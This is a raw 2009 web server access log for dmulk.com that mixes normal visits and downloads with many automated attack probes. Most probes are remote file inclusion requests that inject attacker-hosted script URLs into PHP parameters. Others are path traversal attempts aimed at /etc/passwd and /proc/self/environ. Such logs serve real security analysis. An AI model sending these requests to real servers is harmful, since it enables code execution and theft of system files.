208.43.107.9 - - [28/Apr/2009:11:10:56 -0700] "GET /logs/access_080730.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.43.107.9 - - [28/Apr/2009:11:10:56 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 200 97194 "-" "Mozilla/5.0" "www.dmulk.com"
213.239.146.118 - - [28/Apr/2009:11:11:23 -0700] "GET /index.php?place=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 200 43349 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:11:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:11:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:11:34 -0700] "GET /logs/access_080331.log%20%20///include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:11:49 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:11:58 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.15.177.55 - - [28/Apr/2009:11:12:01 -0700] "GET /logs/access_080221.log//update/update2.php?lang=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.177.55 - - [28/Apr/2009:11:12:01 -0700] "GET /update/update2.php?lang=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.177.55 - - [28/Apr/2009:11:12:01 -0700] "GET /logs//update/update2.php?lang=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.177.55 - - [28/Apr/2009:11:12:01 -0700] "GET /logs/access_080222.log//update/update2.php?lang=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.43.107.9 - - [28/Apr/2009:11:12:31 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 200 43336 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:12:36 -0700] "GET / HTTP/1.1" 200 43150 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:12:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:12:54 -0700] "GET /logs//errors.php?error=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:12:54 -0700] "GET /errors.php?error=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:11:13:02 -0700] "GET /logs/access_081104.log//export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:11:13:02 -0700] "GET /logs/access_081104.log//export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:13:05 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:13:07 -0700] "GET //include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:13:07 -0700] "GET /logs///include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:13:07 -0700] "GET /logs/access_071214.log///include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:13:10 -0700] "GET /logs/access_080730.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:13:10 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 200 97194 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:13:19 -0700] "GET /logs/access_080322.log/test.php?page=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:13:20 -0700] "GET /test.php?page=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:13:21 -0700] "GET /logs/test.php?page=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:13:22 -0700] "GET /logs/access_080322.log/test.php?page=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:13:22 -0700] "GET /test.php?page=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:13:23 -0700] "GET /logs/test.php?page=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:13:24 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:13:29 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 2641 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
168.143.19.89 - - [28/Apr/2009:11:13:29 -0700] "GET /logs//errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [28/Apr/2009:11:13:30 -0700] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
67.15.177.55 - - [28/Apr/2009:11:13:39 -0700] "GET /logs/access_080219.log%20//update/update2.php?lang=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:13:43 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:11:13:45 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:11:13:45 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.83.130 - - [28/Apr/2009:11:13:45 -0700] "GET /logs/access_071122.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.walkersgameear.com/email/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.42.201.180 - - [28/Apr/2009:11:13:50 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.42.201.180 - - [28/Apr/2009:11:13:50 -0700] "GET /logs/access_071122.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.42.201.180 - - [28/Apr/2009:11:13:50 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:13:51 -0700] "GET /logs/access_080331.log///include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:11:13:55 -0700] "GET /logs//errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:11:13:55 -0700] "GET /logs//errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:11:13:55 -0700] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.192.43 - - [28/Apr/2009:11:13:55 -0700] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:13:58 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:14:00 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:14:04 -0700] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:14:04 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:14:04 -0700] "GET /logs/access_071123.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:14:11 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:14:11 -0700] "GET /logs/access_071123.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:14:11 -0700] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:11:14:13 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:29 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:29 -0700] "GET /logs/access_080808.log/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:29 -0700] "GET /logs/access_080606.log/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:29 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:14:32 -0700] "GET /logs/access_080715.log/test.php?page=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:14:36 -0700] "GET /logs/access_080715.log/test.php?page=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:14:37 -0700] "GET /blog/index.php/feed/atom/ HTTP/1.1" 200 2938 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:14:38 -0700] "GET /blog/xmlrpc.php HTTP/1.1" 200 59 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:14:40 -0700] "GET /blog/xmlrpc.php?rsd HTTP/1.1" 200 839 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:14:40 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:14:40 -0700] "GET /logs/access_071122.log%20%20/inc/cmses/aedatingCMS.php?dir[inc]=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.239.74 - - [28/Apr/2009:11:14:40 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://algol.u-strasbg.fr/~jcame//selops/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:44 -0700] "GET /pollphp/db//booth.php?include_path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:44 -0700] "GET /logs//pollphp/db//booth.php?include_path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:44 -0700] "GET /logs/access_090117.log//pollphp/db//booth.php?include_path=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:45 -0700] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:45 -0700] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:45 -0700] "GET /logs/access_090117.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:45 -0700] "GET /pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:45 -0700] "GET /logs//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:45 -0700] "GET /logs/access_090117.log//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:46 -0700] "GET /pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:46 -0700] "GET /logs//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
81.90.214.218 - - [28/Apr/2009:11:14:46 -0700] "GET /logs/access_090117.log//pollphp/db//booth.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:48 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:48 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:48 -0700] "GET /logs/access_080808.log%20%20/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:48 -0700] "GET /logs/access_080606.log%20%20/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:14:54 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:55 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:55 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:55 -0700] "GET /logs/access_080808.log/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:14:55 -0700] "GET /logs/access_080606.log/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:14:55 -0700] "GET /logs/access_080124.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:15:02 -0700] "GET /logs/access_080124.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:15:02 -0700] "GET /logs/access_080526.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:15:08 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:15:08 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:15:08 -0700] "GET /logs/access_081231.log/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:15:08 -0700] "GET /logs/access_080808.log/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:15:09 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
72.82.228.83 - - [28/Apr/2009:11:15:16 -0700] "GET /logs/access_080526.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:15:29 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:15:29 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:15:29 -0700] "GET /logs/access_080712.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:15:31 -0700] "GET /logs/access_081231.log/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:15:31 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:15:31 -0700] "GET /logs/access_080808.log/bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:11:15:31 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:15:33 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 2641 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:15:33 -0700] "GET /blog HTTP/1.1" 301 85 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:15:36 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:15:36 -0700] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:15:36 -0700] "GET /logs/access_080808.log/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.1.180.250 - - [28/Apr/2009:11:15:36 -0700] "GET /logs/access_080606.log/bemarket/postscript/postscript.php?p_mode=http://www.mama-nsk.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:11:15:42 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://yalor.yru.ac.th/~nantharat/modules/left.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:15:48 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
74.52.45.250 - - [28/Apr/2009:11:16:00 -0700] "GET /blog/index.php/feed/atom/ HTTP/1.1" 500 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" "dmulk.com"
66.249.71.68 - - [28/Apr/2009:11:16:02 -0700] "GET /blog/wp-content/gallery/worldrider-2008/1008081327.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:16:02 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:16:03 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:16:03 -0700] "GET /logs/access_080712.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:11:16:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:11:16:19 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:11:16:19 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:11:16:19 -0700] "GET /logs/access_081207.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.80.195.32 - - [28/Apr/2009:11:16:28 -0700] "GET /xfgbdejocaaaomecj.php HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ga=MDAxMjE3OWI0ODA4; .NET CLR 1.1.4322)" "www.dmulk.com"
